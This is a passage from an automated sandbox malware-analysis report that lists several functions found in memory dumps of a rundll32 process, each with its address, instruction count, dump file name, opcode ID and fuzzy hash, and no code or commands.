      • Instruction Fuzzy Hash: 92513C31A087808FD765CF25C590B9BBBE3AFC6714F148A1DD5D947359CB30A846CB82
      Function 04D345E8 Relevance: .1, Instructions: 142COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000002.22960734744.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D31000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_4d31000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 83e520c9c14c22b107fe1247b979f55fca06ddb04bfa23f6c178df8430835192
      • Instruction ID: dffb056b5299756af04868f4193e46696b8d5d24ac4f73d01a628203a861bca7
      • Opcode Fuzzy Hash: 83e520c9c14c22b107fe1247b979f55fca06ddb04bfa23f6c178df8430835192
      • Instruction Fuzzy Hash: CE5157729086718BC724CF18C84026AFBE0BF85761F1A4A69ECD87B251D778BC41CBC2
      Function 06611110 Relevance: .1, Instructions: 129COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 9ccecaab1c9449db6c3f228f2c9e4a468121ef4ca9810753cf88f56f473524e8
      • Instruction ID: fa748dae74b5d09d9c0304ae29cb67bfc73b47e96107d123f5ac032313f5efb0
      • Opcode Fuzzy Hash: 9ccecaab1c9449db6c3f228f2c9e4a468121ef4ca9810753cf88f56f473524e8
      • Instruction Fuzzy Hash: 28513A76A087508FD324CF24C88166AF7E2FBD9320F59492DE6969B350D734B946CF82
      Function 066221E0 Relevance: .1, Instructions: 113COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 14579c35d9cbde739cc8360cc853f669c5923773700718879027475fc59e9fa9
      • Instruction ID: 6d75ba642a2dfd83fa7c7b2eb3e1e3cb66021f38319022dd8357e951d455bd9f
      • Opcode Fuzzy Hash: 14579c35d9cbde739cc8360cc853f669c5923773700718879027475fc59e9fa9
      • Instruction Fuzzy Hash: 80417A726187A18FC704CF28C45002EFBEABFCA710F1A4A5EE5959B350C671F945CB92
      Function 04D34458 Relevance: .1, Instructions: 111COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000002.22960734744.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D31000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_4d31000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: bdc20c9261e43848c2ec5a882ac1bfb77c1b6c9e8568db960eace896f9fbafab
      • Instruction ID: e54626c9c8101641c964916a43e3d4cadf16892fc6664f54815730441b7be179
      • Opcode Fuzzy Hash: bdc20c9261e43848c2ec5a882ac1bfb77c1b6c9e8568db960eace896f9fbafab
      • Instruction Fuzzy Hash: 6041A1317082A18BC704CF29C49452FFBE2AFC9715F598A1DF4C59B294D678F805CB92
      Function 06608510 Relevance: .1, Instructions: 97COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000003.00000003.22556015074.00000000065D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 065D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_3_65d1000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 768aaa8313ca377a087b71db7dbdeccf79672e669432fb3722d5f80fe7f37d71
      • Instruction ID: 9980e924ed4dfb2ea965c642f110b7ecc4a998b6180316031eb1e94158fcde7a
      • Opcode Fuzzy Hash: 768aaa8313ca377a087b71db7dbdeccf79672e669432fb3722d5f80fe7f37d71
      • Instruction Fuzzy Hash: 3E317C729183508FD798CF2AC48001BF7E6BBD9310F1A8A2DE98497394E675E901CB92